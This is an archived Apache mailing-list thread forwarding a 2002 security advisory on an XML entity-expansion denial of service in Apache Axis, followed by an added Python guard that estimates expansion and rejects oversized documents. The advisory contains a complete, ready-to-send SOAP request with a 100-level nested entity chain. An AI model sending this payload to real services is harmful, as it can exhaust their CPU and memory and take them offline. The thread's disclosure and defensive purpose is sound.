Note that this vulnerability exists in Apache SOAP because we use
the DOM parser and there's no way to turn off entity expansion
AFAIK. The only solution would be to do some Xerces specific thing
and lose the JAXP capability .. which would suck.

Sanjiva.

----- Original Message -----
From: "Dirk-Willem van Gulik" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, November 26, 2002 4:27 PM
Subject: Re: Fw: Security Alert - Apache/Axis


>
> Tom/Dims,
>
> Could you folks verify this and report back to [EMAIL PROTECTED] that
> each of those are 100% taken care of ?
>
> Then security@ can report back to the various constituencies, work with
> CERT if that is needed, etc. If you have any thoughts/statement which need
> to be added - make sure you add that.
>
> Dw
>
> On Tue, 26 Nov 2002, Davanum Srinivas wrote:
>
> > I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
> >
> > Thanks,
> > dims
> >
> > --- Ted Leung <[EMAIL PROTECTED]> wrote:
> > > This security alert came through today.
> > >
> > > Ted
> > > ----- Original Message -----
> > > From: "Ian Holsman" <[EMAIL PROTECTED]>
> > > To: <[EMAIL PROTECTED]>
> > > Cc: "Ory Segal" <[EMAIL PROTECTED]>
> > > Sent: Tuesday, November 26, 2002 8:02 AM
> > > Subject: Security Alert - Apache/Axis
> > >
> > >
> > > > Dear [EMAIL PROTECTED],
> > > >
> > > > During a recent security audit at one of our customers, Sanctum found a
> > > > security vulnerability in your product Apache/Axis.
> > > > The details of this vulnerability are described in the attached text file.
> > > >
> > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > > > forums about this vulnerability the last week of November. Please note, the
> > > > advisory will not contain specifics that might enable someone to exploit the
> > > > vulnerability.
> > > >
> > > > We would appreciate it if you could issue a patch in that timeline (i.e.
> > > > around November 25th), so it can be linked to our advisory.
> > > >
> > > > Please feel free to contact me for more information/help.
> > > >
> > > > Thanks,
> > > > -Amit
> > > >
> > > >  <<XML_DTD_Axis.txt>>
> > > >
> > > >
> > >
> > >
> >
> > > ///////////////////////////////////////////////////////////////////////
> > > ========================>> Security Advisory <<========================
> > > ///////////////////////////////////////////////////////////////////////
> > >
> > >
> > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> > >
> > > => Release date: 14/Nov/2002
> > >
> > > => Vendor: Apache Group
> > >
> > > The following product was found to be vulnerable:
> > >
> > >   - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> > >
> > > The versions affected are the latest ones (as of October 2002).
> > >
> > > => Severity: High
> > >
> > > => CVE candidate: Not assigned yet.
> > >
> > > => Summary: Using the DTD part of the XML document, it is possible to cause the
> > > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in
> > > a denial of service condition.
> > >
> > > => Description: The DTD part of the XML document enables the document to define
> > > named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> > > defined using other entities (recursion is prohibited in XML 1.0).
> > > Entities are expanded when they are referenced, inside the XML document.
> > > The attack is comprised of defining and referencing an entity which is defined
> > > using two instances of another entity, which is (in turn) defined as two instances
> > > of yet another entity, and so on. This definition process can be repeated as long
> > > as "necessary" - we found that a nesting level of 100 is usually sufficient.
> > > The 100th entity should be defined simply as a string. This has the effect of having
> > > the first entity contain, in theory, 2^99 (two to the power of ninety nine)
> > > concatenated values of the 100th entity.
> > > Here's an example (the DTD is to be placed after the XML declaration, and before the
> > > root element of the XML document):
> > >
> > > <!DOCTYPE root [
> > > <!ENTITY x100 "foobar">
> > > <!ENTITY  x99 "&x100;&x100;">
> > > <!ENTITY  x98 "&x99;&x99;">
> > > <!ENTITY  x97 "&x98;&x98;">
> > > ...
> > > <!ENTITY   x3 "&x4;&x4;">
> > > <!ENTITY   x2 "&x3;&x3;">
> > > <!ENTITY   x1 "&x2;&x2;">
> > > ]>
> > >
> > > Referring to the first entity inside a document that would otherwise be accepted by
> > > the application (using the syntax &x1;), results in a DoS condition, due to the
> > > excessive CPU load and/or memory load required by the XML parser to expand this entity.
> > >
> > > => Solution: Not available yet.
> > >
> > > => Workaround: Not available yet.
> > >
> > > => Example:
> > >
> > > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring
> > > only a path to an existing web service to be known to the attacker.
> > >
> > > The request is:
> > >
> > > POST path_to_web_service HTTP/1.0
> > > Host: ...
> > > Content-Type: text/xml
> > > SOAPAction: ""
> > > Content-Length: 3224
> > >
> > > <?xml version="1.0" ?>
> > > <!DOCTYPE foobar [
> > > <!ENTITY x0 "hello">
> > > <!ENTITY x1 "&x0;&x0;">
> > > <!ENTITY x2 "&x1;&x1;">
> > > <!ENTITY x3 "&x2;&x2;">
> > > <!ENTITY x4 "&x3;&x3;">
> > > <!ENTITY x5 "&x4;&x4;">
> > > <!ENTITY x6 "&x5;&x5;">
> > > <!ENTITY x7 "&x6;&x6;">
> > > <!ENTITY x8 "&x7;&x7;">
> > > <!ENTITY x9 "&x8;&x8;">
> > > <!ENTITY x10 "&x9;&x9;">
> > > <!ENTITY x11 "&x10;&x10;">
> > > <!ENTITY x12 "&x11;&x11;">
> > > <!ENTITY x13 "&x12;&x12;">
> > > <!ENTITY x14 "&x13;&x13;">
> > > <!ENTITY x15 "&x14;&x14;">
> > > <!ENTITY x16 "&x15;&x15;">
> > > <!ENTITY x17 "&x16;&x16;">
> > > <!ENTITY x18 "&x17;&x17;">
> > > <!ENTITY x19 "&x18;&x18;">
> > > <!ENTITY x20 "&x19;&x19;">
> > > <!ENTITY x21 "&x20;&x20;">
> > > <!ENTITY x22 "&x21;&x21;">
> > > <!ENTITY x23 "&x22;&x22;">
> > > <!ENTITY x24 "&x23;&x23;">
> > > <!ENTITY x25 "&x24;&x24;">
> > > <!ENTITY x26 "&x25;&x25;">
> > > <!ENTITY x27 "&x26;&x26;">
> > > <!ENTITY x28 "&x27;&x27;">
> > > <!ENTITY x29 "&x28;&x28;">
> > > <!ENTITY x30 "&x29;&x29;">
> > > <!ENTITY x31 "&x30;&x30;">
> > > <!ENTITY x32 "&x31;&x31;">
> > > <!ENTITY x33 "&x32;&x32;">
> > > <!ENTITY x34 "&x33;&x33;">
> > > <!ENTITY x35 "&x34;&x34;">
> > > <!ENTITY x36 "&x35;&x35;">
> > > <!ENTITY x37 "&x36;&x36;">
> > > <!ENTITY x38 "&x37;&x37;">
> > > <!ENTITY x39 "&x38;&x38;">
> > > <!ENTITY x40 "&x39;&x39;">
> > > <!ENTITY x41 "&x40;&x40;">
> > > <!ENTITY x42 "&x41;&x41;">
> > > <!ENTITY x43 "&x42;&x42;">
> > > <!ENTITY x44 "&x43;&x43;">
> > > <!ENTITY x45 "&x44;&x44;">
> > > <!ENTITY x46 "&x45;&x45;">
> > > <!ENTITY x47 "&x46;&x46;">
> > > <!ENTITY x48 "&x47;&x47;">
> > > <!ENTITY x49 "&x48;&x48;">
> > > <!ENTITY x50 "&x49;&x49;">
> > > <!ENTITY x51 "&x50;&x50;">
> > > <!ENTITY x52 "&x51;&x51;">
> > > <!ENTITY x53 "&x52;&x52;">
> > > <!ENTITY x54 "&x53;&x53;">
> > > <!ENTITY x55 "&x54;&x54;">
> > > <!ENTITY x56 "&x55;&x55;">
> > > <!ENTITY x57 "&x56;&x56;">
> > > <!ENTITY x58 "&x57;&x57;">
> > > <!ENTITY x59 "&x58;&x58;">
> > > <!ENTITY x60 "&x59;&x59;">
> > > <!ENTITY x61 "&x60;&x60;">
> > > <!ENTITY x62 "&x61;&x61;">
> > > <!ENTITY x63 "&x62;&x62;">
> > > <!ENTITY x64 "&x63;&x63;">
> > > <!ENTITY x65 "&x64;&x64;">
> > > <!ENTITY x66 "&x65;&x65;">
> > > <!ENTITY x67 "&x66;&x66;">
> > > <!ENTITY x68 "&x67;&x67;">
> > > <!ENTITY x69 "&x68;&x68;">
> > > <!ENTITY x70 "&x69;&x69;">
> > > <!ENTITY x71 "&x70;&x70;">
> > > <!ENTITY x72 "&x71;&x71;">
> > > <!ENTITY x73 "&x72;&x72;">
> > > <!ENTITY x74 "&x73;&x73;">
> > > <!ENTITY x75 "&x74;&x74;">
> > > <!ENTITY x76 "&x75;&x75;">
> > > <!ENTITY x77 "&x76;&x76;">
> > > <!ENTITY x78 "&x77;&x77;">
> > > <!ENTITY x79 "&x78;&x78;">
> > > <!ENTITY x80 "&x79;&x79;">
> > > <!ENTITY x81 "&x80;&x80;">
> > > <!ENTITY x82 "&x81;&x81;">
> > > <!ENTITY x83 "&x82;&x82;">
> > > <!ENTITY x84 "&x83;&x83;">
> > > <!ENTITY x85 "&x84;&x84;">
> > > <!ENTITY x86 "&x85;&x85;">
> > > <!ENTITY x87 "&x86;&x86;">
> > > <!ENTITY x88 "&x87;&x87;">
> > > <!ENTITY x89 "&x88;&x88;">
> > > <!ENTITY x90 "&x89;&x89;">
> > > <!ENTITY x91 "&x90;&x90;">
> > > <!ENTITY x92 "&x91;&x91;">
> > > <!ENTITY x93 "&x92;&x92;">
> > > <!ENTITY x94 "&x93;&x93;">
> > > <!ENTITY x95 "&x94;&x94;">
> > > <!ENTITY x96 "&x95;&x95;">
> > > <!ENTITY x97 "&x96;&x96;">
> > > <!ENTITY x98 "&x97;&x97;">
> > > <!ENTITY x99 "&x98;&x98;">
> > > <!ENTITY x100 "&x99;&x99;">
> > > ]>
> > > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> > > xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> > > <SOAP-ENV:Body>
> > > <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> > > <foobar xsi:type="xsd:string">&x100;</foobar>
> > > </ns1:aaa>
> > > </SOAP-ENV:Body>
> > > </SOAP-ENV:Envelope>
> > >
> > >
> >
> >
> > =====
> > Davanum Srinivas - http://xml.apache.org/~dims/
> >
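Sanjiva's point above is that the JAXP/DOM path offers no switch to turn entity expansion off, which is exactly the situation in which a parser-independent guard in front of the parser earns its keep. What follows is an added example written for this page in Python against the standard library's expat binding; it is not code from the advisory, from Sanctum, or from Apache Axis/SOAP. It sizes the expansion of an internal DTD subset from the declarations alone, in time linear in the DTD, so the 2^99 figure the advisory gives for its 100-level chain comes out as arithmetic rather than as a parse that never finishes, and it refuses a document whose expansion exceeds a limit (or carries any DOCTYPE at all) before the real parser sees it. It goes a little beyond the advisory's text by also handling character references, the five predefined entities and the recursive definitions XML 1.0 forbids. The regular expressions, the MAX_EXPANDED_BYTES limit, the doubling_chain sample builder and the BENIGN document are my own constructions, not anything the thread specifies.

```python
"""Added example (not from the advisory or from Apache Axis/SOAP): size the
expansion of an internal DTD subset from its declarations alone, in time linear
in the DTD, and refuse to parse a document whose expansion exceeds a limit."""
import re
import xml.parsers.expat as expat

# Double-quoted internal entity declarations and entity references. Parameter
# entities (%name;) and external SYSTEM/PUBLIC entities are not modelled here;
# a production guard should reject those outright.
ENTITY_DECL = re.compile(r'<!ENTITY\s+([^\s%]+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&([^;&\s]+);')
DOCTYPE = re.compile(r'<!DOCTYPE\b[^\[>]*(?:\[(.*?)\])?\s*>', re.S)
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}
MAX_EXPANDED_BYTES = 1_000_000   # assumed policy limit; tune per deployment

def split_doctype(doc):
    """Return (has_doctype, internal_subset, body_after_doctype)."""
    m = DOCTYPE.search(doc)
    if not m:
        return False, '', doc
    return True, (m.group(1) or ''), doc[m.end():]

def ref_size(name, sizes):
    """Expanded length contributed by one reference &name;."""
    if name.startswith('#'):             # character reference: one code point
        return 1
    if name in sizes:
        return sizes[name]
    if name in PREDEFINED:
        return PREDEFINED[name]
    raise ValueError(f"reference to undeclared entity &{name};")

def expansion_sizes(subset):
    """Fully expanded length of every general entity in the internal subset,
    computed without expanding anything: each entity is sized once and memoised,
    so the work is linear in the DTD while the result can be astronomical.
    Recursive definitions (forbidden by XML 1.0) raise ValueError."""
    decls = {}
    for name, value in ENTITY_DECL.findall(subset):
        decls.setdefault(name, value)    # XML: the first binding of a name wins
    sizes, in_progress = {}, set()

    def size_of(name):
        if name not in decls:
            return ref_size(name, sizes)
        if name in sizes:
            return sizes[name]
        if name in in_progress:
            raise ValueError(f"recursive entity definition &{name};")
        in_progress.add(name)
        value = decls[name]
        total = len(ENTITY_REF.sub('', value))              # literal characters
        total += sum(size_of(ref) for ref in ENTITY_REF.findall(value))
        in_progress.discard(name)
        sizes[name] = total
        return total

    for name in decls:
        size_of(name)
    return sizes

def expanded_size(doc):
    """Length of the body after the DOCTYPE once every reference is expanded."""
    _, subset, body = split_doctype(doc)
    sizes = expansion_sizes(subset)
    total = len(ENTITY_REF.sub('', body))
    return total + sum(ref_size(ref, sizes) for ref in ENTITY_REF.findall(body))

def parse_if_safe(doc, max_expanded=MAX_EXPANDED_BYTES, allow_dtd=True):
    """Estimate first, parse with expat only if the estimate passes. allow_dtd=False
    rejects any DOCTYPE at all, the simplest policy for SOAP endpoints, whose
    messages never need one. Returns the element names in document order."""
    has_doctype, _, _ = split_doctype(doc)
    if has_doctype and not allow_dtd:
        raise ValueError("DOCTYPE is not permitted by policy")
    size = expanded_size(doc)
    if size > max_expanded:
        raise ValueError(f"entity expansion would yield {size} bytes "
                         f"(limit {max_expanded}); rejected before parsing")
    names = []
    parser = expat.ParserCreate()
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(doc, True)
    return names

def doubling_chain(levels, seed="hello"):
    """Constructed sample in the shape the advisory describes: x0 is a literal,
    each x_i is two copies of x_{i-1}, and the body references the last one.
    levels=100 matches the advisory's depth, without its SOAP wrapping."""
    decls = [f'<!ENTITY x0 "{seed}">'] + [
        f'<!ENTITY x{i} "&x{i - 1};&x{i - 1};">' for i in range(1, levels + 1)]
    return ('<?xml version="1.0"?>\n<!DOCTYPE foobar [\n' + '\n'.join(decls)
            + f'\n]>\n<root><foobar>&x{levels};</foobar></root>\n')

BENIGN = '<?xml version="1.0"?><root><a>1 &lt; 2</a><b>&#65;</b></root>'
```

`expanded_size(doubling_chain(100))` returns 32 + 5·2^100 from a few kilobytes of input, and `parse_if_safe` on the same document raises ValueError without expat ever seeing it, while on BENIGN it returns ['root', 'a', 'b']. The estimate deliberately does not model parameter or external entities: a guard that meets either should simply reject, which is also the cheapest answer for a SOAP endpoint, where a DOCTYPE has no legitimate business in the first place.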